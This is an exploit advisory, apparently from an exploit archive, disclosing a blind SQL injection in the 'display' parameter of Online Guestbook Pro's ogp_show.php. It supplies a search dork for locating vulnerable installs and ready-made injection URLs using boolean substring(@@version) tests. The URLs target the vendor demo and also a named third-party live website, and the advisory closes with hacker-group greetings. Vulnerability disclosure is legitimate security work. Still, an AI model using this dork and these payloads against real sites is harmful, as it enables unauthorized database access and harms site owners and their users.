Online Guestbook Pro (display) Blind SQL Injection Vulnerability

2009.04.17
Credit: Hussin X
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Online Guestbook Pro (display) Blind SQL Injection Vulnerability {____________________________________} Author: Hussin X Home : WwW.IQ-TY.CoM email: darkangel_g85[at]Yahoo[DoT]com {____________________________________} script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php DorK : Powered by Online Guestbook Pro Demo : http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5 http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=4 BuT Results = Forbidden :D demo to any web http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=5 http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=4 Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab } end.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top